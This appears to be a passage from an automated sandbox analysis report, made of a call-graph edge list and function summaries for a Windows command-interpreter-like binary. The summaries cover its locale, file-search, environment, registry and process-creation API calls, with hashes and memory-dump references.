22191->22208 22192 51546 22204 4dc60 2 API calls 22192->22204 22199 478e4 448 API calls 22193->22199 22197 51313 ferror 22194->22197 22198 5136e _pclose 22194->22198 22202 5ec3b longjmp 22195->22202 22196->22163 22197->22198 22197->22208 22206 4dd20 448 API calls 22198->22206 22205 5ecf2 GetLastError 22199->22205 22200 5ecb3 _pclose 22200->22161 22201 5134d fgets 22201->22198 22201->22208 22202->22161 22203->22163 22204->22200 22205->22161 22206->22208 22207 513db MultiByteToWideChar 22207->22208 22208->22161 22208->22164 22208->22172 22208->22176 22208->22177 22208->22184 22208->22185 22208->22186 22208->22188 22208->22191 22208->22192 22208->22198 22208->22200 22208->22201 22208->22207 22208->22208 22208->22211 22212 514e7 feof 22208->22212 22213 50fc8 wcschr 22208->22213 22214 4dcd0 448 API calls 22208->22214 22215 5ecc9 22208->22215 22216 50f0a wcschr 22208->22216 22217 50bbb 485 API calls 22208->22217 22219 513b7 memmove 22208->22219 22220 50f90 wcschr 22208->22220 22209->22159 22209->22162 22210->22163 22210->22182 22211->22182 22211->22208 22212->22197 22212->22208 22213->22208 22214->22208 22218 478e4 448 API calls 22215->22218 22216->22208 22217->22208 22218->22161 22219->22208 22220->22208 22222 46f39 22221->22222 22225 46ea7 22221->22225 22223 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 22222->22223 22224 46f4e 22223->22224 22224->21080 22225->22222 22226 5a746 22225->22226 22228 46f5d 22225->22228 22230 4a62f wcschr 22225->22230 22235 50bbb 485 API calls 22225->22235 22238 5198f 3 API calls 22225->22238 22227 698b5 453 API calls 22226->22227 22257 4701a 22227->22257 22229 50060 5 API calls 22228->22229 22231 46f64 22229->22231 22230->22225 22233 4acb0 448 API calls 22231->22233 22232 4dcd0 448 API calls 22232->22257 22234 46f6b 22233->22234 22236 5589a 10 API calls 22234->22236 22235->22225 22237 46fa6 22236->22237 22242 48f21 448 API calls 22237->22242 22237->22257 22238->22225 22239 4dc60 2 API calls 22239->22257 22240 698b5 453 API calls 22240->22257 22241 55851 2 API calls 22241->22257 22250 46fbf 22242->22250 22243 5a7fa 22249 4dc60 2 API calls 22243->22249 22244 5198f 3 API calls 22244->22257 22245 48b4d 2 API calls 22245->22257 22246 5a806 22247 69922 448 API calls 22246->22247 22251 5a80b longjmp 22247->22251 22248 4725d 22254 5a851 22248->22254 22255 47271 22248->22255 22249->22246 22250->22246 22252 4dcd0 448 API calls 22250->22252 22250->22257 22253 5a819 22251->22253 22252->22257 22306 521d2 22253->22306 22256 69a7d 448 API calls 22254->22256 22258 48bc7 448 API calls 22255->22258 22260 5a85c 22256->22260 22257->22232 22257->22239 22257->22240 22257->22241 22257->22243 22257->22244 22257->22245 22257->22246 22257->22248 22263 4dd20 448 API calls 22257->22263 22265 50bbb 485 API calls 22257->22265 22261 4727b GetProcessHeap RtlFreeHeap 22258->22261 22264 472ee 8 API calls 22261->22264 22262 5a824 22267 51e70 448 API calls 22262->22267 22269 5a835 exit 22262->22269 22263->22257 22266 47294 22264->22266 22265->22257 22305 472c6 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 22266->22305 22267->22262 22269->22248 22270 4729c GetProcessHeap RtlFreeHeap 22271 472bc 22270->22271 22271->21080 22273 4a7db 22272->22273 22273->21073 22273->22273 22310 4b45a 22274->22310 22277 6769e 459 API calls 22278 5ebcc 22277->22278 22279 63b4e 448 API calls 22278->22279 22280 5ebd5 22279->22280 22281 49950 448 API calls 22280->22281 22282 50bd6 22281->22282 22282->21094 22286 63ea6 22283->22286 22284 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 22285 6418b 22284->22285 22285->21080 22287 4dcd0 448 API calls 22286->22287 22300 6416f 22286->22300 22292 63ef9 22287->22292 22288 46e57 499 API calls 22289 63f70 22288->22289 22290 4dc60 2 API calls 22289->22290 22291 63f7b 22290->22291 22293 4dcd0 448 API calls 22291->22293 22292->22288 22292->22300 22294 63fa4 22293->22294 22295 63fe2 FindFirstFileW 22294->22295 22294->22300 22296 64164 22295->22296 22303 64006 22295->22303 22298 4dc60 2 API calls 22296->22298 22297 6413c FindNextFileW 22299 64153 FindClose 22297->22299 22297->22303 22298->22300 22299->22296 22300->22284 22302 4dd20 448 API calls 22302->22303 22303->22297 22303->22299 22303->22302 22304 63e66 499 API calls 22303->22304 22304->22303 22305->22270 22307 521d6 22306->22307 22308 521df 22306->22308 22307->22308 22309 5f25c SetConsoleTitleW 22307->22309 22308->22262 22309->22262 22322 4b46c 22310->22322 22311 4b53c 22316 4b4c8 22311->22316 22318 4b484 22311->22318 22321 4b4bf 22311->22321 22313 4b45a 474 API calls 22314 4b4d2 22313->22314 22319 4b45a 474 API calls 22314->22319 22314->22321 22316->22313 22316->22321 22317 4b5b0 474 API calls 22317->22322 22318->22321 22328 4b5b0 22318->22328 22324 4b4e4 22319->22324 22320 4b5b0 474 API calls 22325 4b4a5 22320->22325 22321->22277 22321->22282 22322->22311 22322->22316 22322->22317 22322->22318 22322->22321 22323 4b45a 474 API calls 22322->22323 22323->22322 22324->22321 22327 4b5b0 474 API calls 22324->22327 22325->22321 22326 4b5b0 474 API calls 22325->22326 22326->22325 22327->22324 22329 4b5c8 22328->22329 22330 4b490 22328->22330 22329->22330 22331 4dcd0 448 API calls 22329->22331 22330->22320 22330->22321 22333 4b5eb 22331->22333 22332 4b631 22332->22330 22334 4dd20 448 API calls 22332->22334 22333->22330 22333->22332 22335 4ee03 474 API calls 22333->22335 22336 501f5 wcsrchr 22333->22336 22334->22330 22335->22333 22336->22333 22402 57d90 22337->22402 22339 49467 InitializeProcThreadAttributeList 22340 5bdf1 GetLastError 22339->22340 22341 494b8 UpdateProcThreadAttribute 22339->22341 22414 65c54 22340->22414 22343 494e7 memset memset GetStartupInfoW 22341->22343 22344 5be0d GetLastError 22341->22344 22346 51d90 451 API calls 22343->22346 22347 65c54 448 API calls 22344->22347 22345 5be03 22345->22344 22348 49579 22346->22348 22349 5be1f DeleteProcThreadAttributeList 22347->22349 22351 4acb0 448 API calls 22348->22351 22350 5be5c 22349->22350 22350->21122 22353 49589 22351->22353 22352 5be49 _local_unwind4 22352->22350 22353->22352 22354 501f5 wcsrchr 22353->22354 22355 495c6 22353->22355 22356 495ae 22354->22356 22403 48235 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22355->22403 22356->22355 22357 495b2 lstrcmpW 22356->22357 22357->22355 22359 5be83 22357->22359 22419 650d8 22359->22419 22360 495cb 22362 495d8 22360->22362 22365 49711 CreateProcessAsUserW 22360->22365 22363 5bec4 22362->22363 22364 495e5 CreateProcessW 22362->22364 22368 5bece GetLastError 22363->22368 22366 49608 22364->22366 22365->22366 22366->22368 22369 49612 CloseHandle 22366->22369 22397 521d2 SetConsoleTitleW 22396->22397 22398 521c0 22397->22398 22398->21129 22400 521d2 SetConsoleTitleW 22399->22400 22401 521cc 22400->22401 22401->21129 22402->22339 22403->22360 22418 65c6a 22414->22418 22415 65d93 22415->22345 22416 478e4 448 API calls 22417 65dfe 22416->22417 22417->22345 22418->22415 22418->22416 22420 51d90 451 API calls 22419->22420 22421 650e8 22420->22421 22501 556e2 22500->22501 22502 613ca 22500->22502 22504 556ef 22501->22504 22508 61256 22501->22508 22509 61303 22501->22509 22503 6155c 22502->22503 22505 6126a longjmp 22502->22505 22511 613e2 22502->22511 22524 614e7 22502->22524 22507 55726 449 API calls 22503->22507 22561 55726 22504->22561 22510 61277 22505->22510 22547 612fb 22507->22547 22508->22504 22508->22510 22520 61264 22508->22520 22516 55726 449 API calls 22509->22516 22513 55726 449 API calls 22510->22513 22514 613e7 22511->22514 22515 61433 22511->22515 22512 556fe 22517 55711 22512->22517 22522 55726 449 API calls 22512->22522 22536 61288 22513->22536 22514->22505 22527 613fc 22514->22527 22519 557c9 449 API calls 22515->22519 22532 61316 22516->22532 22573 557c9 22517->22573 22518 556c4 449 API calls 22526 61583 22518->22526 22539 6143b 22519->22539 22520->22505 22520->22515 22521 55726 449 API calls 22521->22503 22522->22517 22524->22521 22525 5571d 22525->21135 22526->21135 22533 55726 449 API calls 22527->22533 22528 6136e 22530 55726 449 API calls 22528->22530 22529 61471 22531 556c4 449 API calls 22529->22531 22534 61380 22530->22534 22538 614c2 22531->22538 22532->22528 22548 55726 449 API calls 22532->22548 22551 61326 22532->22551 22533->22525 22541 55726 449 API calls 22534->22541 22535 612c7 22537 556c4 449 API calls 22535->22537 22536->22535 22542 55726 449 API calls 22536->22542 22543 612d6 22537->22543 22544 55726 449 API calls 22538->22544 22539->22529 22552 6145c 22539->22552 22553 6147a 22539->22553 22540 55726 449 API calls 22540->22528 22545 61390 22541->22545 22542->22535 22546 556c4 449 API calls 22543->22546 22544->22547 22549 55726 449 API calls 22545->22549 22550 612e3 22546->22550 22547->22518 22547->22525 22548->22551 22554 6139f 22549->22554 22550->22525 22558 55726 449 API calls 22550->22558 22551->22528 22551->22540 22552->22529 22559 55726 449 API calls 22552->22559 22556 55726 449 API calls 22553->22556 22555 55726 449 API calls 22554->22555 22557 613b0 22555->22557 22556->22529 22560 55726 449 API calls 22557->22560 22558->22547 22559->22529 22560->22547 22562 5573f 22561->22562 22563 478e4 448 API calls 22562->22563 22568 55781 22562->22568 22564 6159e longjmp 22563->22564 22565 615ae 22564->22565 22566 55726 448 API calls 22565->22566 22567 615c9 22566->22567 22569 55726 448 API calls 22567->22569 22568->22512 22570 615f4 22569->22570 22571 55726 448 API calls 22570->22571 22572 61603 22571->22572 22572->22512 22574 557e4 22573->22574 22574->22525 22575 55726 449 API calls 22574->22575 22576 615c9 22575->22576 22577 55726 449 API calls 22576->22577 22578 615f4 22577->22578 22579 55726 449 API calls 22578->22579 22580 61603 22579->22580 22580->22525 22582 51eb2 22581->22582 22583 5f110 22582->22583 22585 51eef 22582->22585 22586 51ebc 22582->22586 22584 572ef ApiSetQueryApiSetPresence 22583->22584 22587 5f12e 22584->22587 22585->22586 22588 5f15b realloc 22585->22588 22586->18689 22587->18689 22588->22586 22590 56474 22589->22590 22591 56464 NtOpenProcessToken 22589->22591 22592 562fa 22590->22592 22599 56500 NtQueryInformationToken 22590->22599 22591->22590 22592->18701 22592->18702 22595 564a8 22595->22592 22596 564bc NtClose 22595->22596 22596->22592 22598->18722 22600 5648a 22599->22600 22601 56534 22599->22601 22600->22595 22603 564ca NtQueryInformationToken 22600->22603 22601->22600 22602 62018 NtQueryInformationToken 22601->22602 22602->22600 22604 564f3 22603->22604 22604->22595 23097 66910 23098 66921 23097->23098 23099 6692c 23097->23099 23103 65e03 23098->23103 23101 65e03 465 API calls 23099->23101 23102 66926 23101->23102 23126 571a8 23103->23126 23105 65e0f RegOpenKeyExW 23106 65e45 23105->23106 23107 65f03 23105->23107 23108 4bc30 448 API calls 23106->23108 23107->23102 23109 65e57 23108->23109 23110 50060 5 API calls 23109->23110 23117 65e64 23109->23117 23112 65e77 23110->23112 23113 4acb0 448 API calls 23112->23113 23116 65e7e 23113->23116 23116->23117 23120 65e9b 23116->23120 23121 65e6e 23116->23121 23127 65948 23117->23127 23118 65ea0 23119 478e4 448 API calls 23118->23119 23119->23121 23120->23118 23122 4acb0 448 API calls 23120->23122 23196 65f1c 23121->23196 23123 65ec1 23122->23123 23123->23118 23123->23121 23124 65edc 23123->23124 23165 66650 23124->23165 23126->23105 23128 65af8 23127->23128 23148 65970 23127->23148 23130 65b16 23128->23130 23131 65afe 23128->23131 23129 65990 RegEnumKeyExW 23135 65ae7 23129->23135 23129->23148 23132 4ab7f 2 API calls 23130->23132 23133 478e4 448 API calls 23131->23133 23134 65b1d 23132->23134 23133->23135 23136 4acb0 448 API calls 23134->23136 23138 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 23135->23138 23137 65b24 23136->23137 23137->23135 23140 501f5 wcsrchr 23137->23140 23139 65c52 23138->23139 23139->23121 23142 65b3c 23140->23142 23144 65b68 23142->23144 23150 65b7f 23142->23150 23143 65ae2 23145 56c78 4 API calls 23143->23145 23146 478e4 448 API calls 23144->23146 23145->23135 23149 65b74 23146->23149 23147 4dc60 2 API calls 23147->23148 23148->23129 23148->23135 23148->23143 23148->23147 23148->23148 23153 49950 448 API calls 23148->23153 23201 662b3 23148->23201 23152 4dc60 2 API calls 23149->23152 23151 65b9e RegOpenKeyExW 23150->23151 23154 65bd6 23151->23154 23155 65bc4 23151->23155 23152->23135 23153->23148 23157 662b3 453 API calls 23154->23157 23156 478e4 448 API calls 23155->23156 23156->23149 23158 65be7 23157->23158 23159 65c21 23158->23159 23163 65c13 23158->23163 23160 478e4 448 API calls 23159->23160 23161 65c1f 23160->23161 23162 4dc60 2 API calls 23161->23162 23162->23149 23164 49950 448 API calls 23163->23164 23164->23161 23166 66680 23165->23166 23166->23166 23167 6669b 23166->23167 23174 666b0 23166->23174 23168 478e4 448 API calls 23167->23168 23181 666a6 23168->23181 23169 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 23170 668da 23169->23170 23170->23121 23171 66729 RegOpenKeyExW 23172 66755 23171->23172 23173 66831 23171->23173 23175 6681c 23172->23175 23186 66768 23172->23186 23176 6689c RegDeleteValueW 23173->23176 23180 6683c RegSetValueExW 23173->23180 23174->23171 23177 478e4 448 API calls 23175->23177 23178 668bf RegCloseKey 23176->23178 23179 668af 23176->23179 23177->23181 23178->23181 23182 478e4 448 API calls 23179->23182 23187 66873 23180->23187 23188 66881 23180->23188 23181->23169 23183 6687f 23182->23183 23183->23178 23184 667a4 RegCreateKeyExW 23184->23186 23189 66801 23184->23189 23186->23173 23186->23184 23192 667ea RegCloseKey 23186->23192 23190 49950 448 API calls 23187->23190 23191 478e4 448 API calls 23188->23191 23193 478e4 448 API calls 23189->23193 23190->23183 23194 6688a 23191->23194 23192->23186 23193->23181 23195 478e4 448 API calls 23194->23195 23195->23183 23197 4dc60 2 API calls 23196->23197 23198 65f23 23197->23198 23199 4dc60 2 API calls 23198->23199 23200 65ef8 RegCloseKey 23199->23200 23200->23107 23202 662bf 23201->23202 23203 662f3 RegQueryValueExW 23202->23203 23204 662dd RegOpenKeyExW 23202->23204 23205 6630c 23203->23205 23206 6631d 23203->23206 23204->23203 23213 662f0 SetLastError 23204->23213 23207 4acb0 448 API calls 23205->23207 23210 4dcd0 448 API calls 23206->23210 23206->23213 23209 66316 23207->23209 23218 66387 23209->23218 23211 66329 23210->23211 23212 66332 RegQueryValueExW 23211->23212 23211->23213 23212->23209 23215 6634c 23212->23215 23213->23209 23217 4dc60 2 API calls 23215->23217 23217->23213 23219 6636f 23218->23219 23220 6638c RegCloseKey 23218->23220 23219->23148 23220->23219 25531 668e0 25532 668f1 25531->25532 25533 668fc 25531->25533 25537 65679 25532->25537 25535 65679 466 API calls 25533->25535 25536 668f6 25535->25536 25562 571a8 25537->25562 25539 65685 RegOpenKeyExW 25540 65780 25539->25540 25541 656bb 25539->25541 25540->25536 25542 4bc30 448 API calls 25541->25542 25543 656cd 25542->25543 25544 656da 25543->25544 25545 50060 5 API calls 25543->25545 25563 657a8 25544->25563 25547 656ed 25545->25547 25549 4acb0 448 API calls 25547->25549 25548 656e4 25614 65799 25548->25614 25551 656f4 25549->25551 25551->25544 25551->25548 25554 65711 25551->25554 25553 65716 25555 478e4 448 API calls 25553->25555 25554->25553 25556 50060 5 API calls 25554->25556 25555->25548 25557 65737 25556->25557 25558 4acb0 448 API calls 25557->25558 25559 6573e 25558->25559 25559->25548 25559->25553 25560 65759 25559->25560 25591 664db 25560->25591 25562->25539 25564 658af 25563->25564 25579 657d0 25563->25579 25566 4ab7f 2 API calls 25564->25566 25565 657da RegEnumKeyExW 25570 65892 25565->25570 25565->25579 25567 658b6 25566->25567 25568 4acb0 448 API calls 25567->25568 25569 658bd 25568->25569 25569->25570 25573 501f5 wcsrchr 25569->25573 25572 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 25570->25572 25571 662b3 453 API calls 25571->25579 25574 65946 25572->25574 25576 658cd 25573->25576 25574->25548 25575 65885 GetLastError 25577 478e4 448 API calls 25575->25577 25578 662b3 453 API calls 25576->25578 25577->25570 25582 658df 25578->25582 25579->25565 25579->25570 25579->25571 25579->25575 25580 49950 448 API calls 25579->25580 25581 4dc60 2 API calls 25579->25581 25580->25579 25581->25579 25583 65913 25582->25583 25587 65903 25582->25587 25584 478e4 448 API calls 25583->25584 25585 6590f 25584->25585 25586 4dc60 2 API calls 25585->25586 25588 65930 25586->25588 25589 49950 448 API calls 25587->25589 25590 4dc60 2 API calls 25588->25590 25589->25585 25590->25570 25592 664e7 25591->25592 25593 6658c RegDeleteKeyExW 25592->25593 25595 66502 RegCreateKeyExW 25592->25595 25594 6659f RegOpenKeyExW 25593->25594 25600 6656b 25593->25600 25596 665cc RegDeleteValueW 25594->25596 25601 665bc 25594->25601 25597 66573 25595->25597 25598 6651e RegSetValueExW RegCloseKey 25595->25598 25602 665e3 25596->25602 25603 665ec RegCloseKey 25596->25603 25604 478e4 448 API calls 25597->25604 25598->25597 25610 6655d 25598->25610 25599 572ef ApiSetQueryApiSetPresence 25605 66601 25599->25605 25600->25599 25600->25605 25601->25600 25606 478e4 448 API calls 25601->25606 25608 478e4 448 API calls 25602->25608 25603->25600 25609 6657a 25604->25609 25605->25548 25606->25600 25611 665ea 25608->25611 25612 478e4 448 API calls 25609->25612 25613 49950 448 API calls 25610->25613 25611->25603 25612->25600 25613->25600 25615 4dc60 2 API calls 25614->25615 25616 657a0 25615->25616 25617 4dc60 2 API calls 25616->25617 25618 65775 RegCloseKey 25617->25618 25618->25540

                                                                      Executed Functions

                                                                      Function 00048572 Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 392COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 96 48572-485a6 call 48791 GetLocaleInfoW 99 485ac-485c4 GetLocaleInfoW 96->99 100 5b2f9-5b300 96->100 102 485c6-485cb 99->102 103 48602-4861c GetLocaleInfoW 99->103 101 5b302-5b30a 100->101 104 5b320-5b322 101->104 105 5b30c-5b313 101->105 106 485d1-485d7 102->106 107 4863e-4865e GetLocaleInfoW 103->107 108 4861e-48628 103->108 110 5b324 104->110 111 5b327-5b329 104->111 105->104 109 5b315-5b31e 105->109 112 48787-48789 106->112 113 485dd-485e0 106->113 116 48660-48667 107->116 117 48673-48685 GetLocaleInfoW 107->117 114 5b331-5b334 108->114 115 4862e-48634 108->115 109->101 109->104 110->111 111->114 112->100 121 485e2-485ea 113->121 122 485fb-485fd 113->122 123 5b336-5b339 114->123 124 5b358-5b36c 114->124 115->107 116->117 118 48669 116->118 119 5b371-5b378 117->119 120 4868b-486a0 GetLocaleInfoW 117->120 118->117 129 5b37a-5b382 119->129 125 486a6-486b8 GetLocaleInfoW 120->125 126 5b3a9-5b3b0 120->126 121->112 127 485f0-485f9 121->127 122->103 123->107 128 5b33f-5b353 123->128 124->107 130 5b3e1-5b3e8 125->130 131 486be-486d0 GetLocaleInfoW 125->131 132 5b3b2-5b3ba 126->132 127->106 127->122 128->107 133 5b384-5b38b 129->133 134 5b398-5b39a 129->134 141 5b3ea-5b3f2 130->141 137 486d6-486e8 GetLocaleInfoW 131->137 138 5b419-5b420 131->138 139 5b3d0-5b3d2 132->139 140 5b3bc-5b3c3 132->140 133->134 142 5b38d-5b396 133->142 135 5b39c 134->135 136 5b39f-5b3a1 134->136 135->136 136->126 144 5b451-5b458 137->144 145 486ee-48700 GetLocaleInfoW 137->145 143 5b422-5b42a 138->143 147 5b3d4 139->147 148 5b3d7-5b3d9 139->148 140->139 146 5b3c5-5b3ce 140->146 149 5b3f4-5b3fb 141->149 150 5b408-5b40a 141->150 142->129 142->134 153 5b440-5b442 143->153 154 5b42c-5b433 143->154 157 5b45a-5b462 144->157 155 48706-48718 GetLocaleInfoW 145->155 156 5b489-5b490 145->156 146->132 146->139 147->148 148->130 149->150 158 5b3fd-5b406 149->158 151 5b40c 150->151 152 5b40f-5b411 150->152 151->152 152->138 163 5b444 153->163 164 5b447-5b449 153->164 154->153 160 5b435-5b43e 154->160 161 5b4c1-5b4c8 155->161 162 4871e-48730 GetLocaleInfoW 155->162 159 5b492-5b49a 156->159 165 5b464-5b46b 157->165 166 5b478-5b47a 157->166 158->141 158->150 169 5b4b0-5b4b2 159->169 170 5b49c-5b4a3 159->170 160->143 160->153 173 5b4ca-5b4d2 161->173 171 48736-4874b GetLocaleInfoW 162->171 172 5b4f9-5b4fe 162->172 163->164 164->144 165->166 174 5b46d-5b476 165->174 167 5b47c 166->167 168 5b47f-5b481 166->168 167->168 168->156 177 5b4b4 169->177 178 5b4b7-5b4b9 169->178 170->169 176 5b4a5-5b4ae 170->176 179 48751-48763 GetLocaleInfoW 171->179 180 5b52f-5b536 171->180 175 5b500-5b508 172->175 181 5b4d4-5b4db 173->181 182 5b4e8-5b4ea 173->182 174->157 174->166 185 5b51e-5b520 175->185 186 5b50a-5b511 175->186 176->159 176->169 177->178 178->161 187 5b567-5b56c 179->187 188 48769-48786 setlocale call 56b30 179->188 189 5b538-5b540 180->189 181->182 190 5b4dd-5b4e6 181->190 183 5b4ec 182->183 184 5b4ef-5b4f1 182->184 183->184 184->172 193 5b525-5b527 185->193 194 5b522 185->194 186->185 192 5b513-5b51c 186->192 191 5b56e-5b576 187->191 196 5b556-5b558 189->196 197 5b542-5b549 189->197 190->173 190->182 200 5b58c-5b58e 191->200 201 5b578-5b57f 191->201 192->175 192->185 193->180 194->193 198 5b55d-5b55f 196->198 199 5b55a 196->199 197->196 203 5b54b-5b554 197->203 198->187 199->198 205 5b590 200->205 206 5b593-5b595 200->206 201->200 204 5b581-5b58a 201->204 203->189 203->196 204->191 204->200 205->206
                                                                      APIs
                                                                        • Part of subcall function 00048791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00046906,0000001F,?,00000080), ref: 00048791
                                                                      • GetLocaleInfoW.KERNELBASE(00000000,0000001E,0007C9E0,00000008), ref: 0004859E
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 000485BC
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00048614
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00048653
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,0007C9D0,00000008), ref: 0004867D
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,0007C970,00000020), ref: 00048698
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,0007C930,00000020), ref: 000486B0
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,0007C8F0,00000020), ref: 000486C8
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,0007C8B0,00000020), ref: 000486E0
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,0007C870,00000020), ref: 000486F8
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,0007C830,00000020), ref: 00048710
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,0007C7F0,00000020), ref: 00048728
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,0007C9C0,00000008), ref: 00048743
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,0007C9B0,00000008), ref: 0004875B
                                                                      • setlocale.MSVCRT ref: 00048770
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                      • API String ID: 1351325837-2236139042
                                                                      • Opcode ID: adb845fc361d49710dc648f9f2b9a178651a5ca7c9924224a406f4902664fd9b
                                                                      • Instruction ID: 2c104b7e7d4393285f2ba76a05b4f849574467033e56347c6849748b43dc8946
                                                                      • Opcode Fuzzy Hash: adb845fc361d49710dc648f9f2b9a178651a5ca7c9924224a406f4902664fd9b
                                                                      • Instruction Fuzzy Hash: 51C101B570021296EBB08F39CD08B7B37E9AF51741F20553AED46DA284EF78DA09C764
                                                                      Function 00050207 Relevance: 9.2, APIs: 6, Instructions: 154fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 832 50207-50236 833 50239-50242 832->833 833->833 834 50244-5024a 833->834 835 50250-50255 834->835 836 5037d 834->836 837 50259-50263 835->837 838 5e739-5e750 _wcsicmp 836->838 839 50265-50268 837->839 840 5028c-502a9 FindFirstFileW 837->840 841 502c5-502cf 838->841 842 5e756-5e75d 838->842 839->840 845 5026a-50270 839->845 843 502af-502bf FindClose 840->843 844 5e798-5e79b 840->844 848 502d2-502dd 841->848 843->841 847 5034d-50351 843->847 845->837 846 50272-50289 call 56b30 845->846 847->842 851 50357-50372 _wcsnicmp 847->851 848->848 850 502df-502f7 848->850 850->836 853 502fd-502ff 850->853 851->841 854 50378 851->854 855 50305-50348 memcpy call 4f3a0 853->855 856 5e762-5e764 853->856 854->838 855->845 857 5e767-5e772 856->857 857->857 859 5e774-5e791 memmove 857->859 859->844
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,?,00000000,00000000,00000000), ref: 00050297
                                                                      • FindClose.KERNELBASE(00000000), ref: 000502B0
                                                                      • memcpy.MSVCRT(?,?,?), ref: 00050311
                                                                      • _wcsnicmp.MSVCRT ref: 00050367
                                                                      • _wcsicmp.MSVCRT ref: 0005E746
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                                      • String ID:
                                                                      • API String ID: 242869866-0
                                                                      • Opcode ID: 60acd6d37f327ec0c697dc494c5cb26ccd737d68050adbefaf257cc1edde1d27
                                                                      • Instruction ID: 353d2c70862106dab951ea1ec72d1577530fd8f4861e6766a28d7ac294dd1c37
                                                                      • Opcode Fuzzy Hash: 60acd6d37f327ec0c697dc494c5cb26ccd737d68050adbefaf257cc1edde1d27
                                                                      • Instruction Fuzzy Hash: 99519F756083119BDB24DF28D8486AFB7E5FFC8311F144A2EEC8987240E735DA09CB96
                                                                      Function 0004A9D4 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 876 4a9d4-4a9e4 GetEnvironmentStringsW 877 4a9e6-4aa04 call 4aa20 GetProcessHeap RtlAllocateHeap 876->877 878 4aa19-4aa1d 876->878 881 4aa06-4aa0e memcpy 877->881 882 4aa11-4aa18 FreeEnvironmentStringsW 877->882 881->882 882->878
                                                                      APIs
                                                                      • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0004A9C5), ref: 0004A9D8
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0004A9F3
                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0004A9FA
                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0004AA09
                                                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0004AA12
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
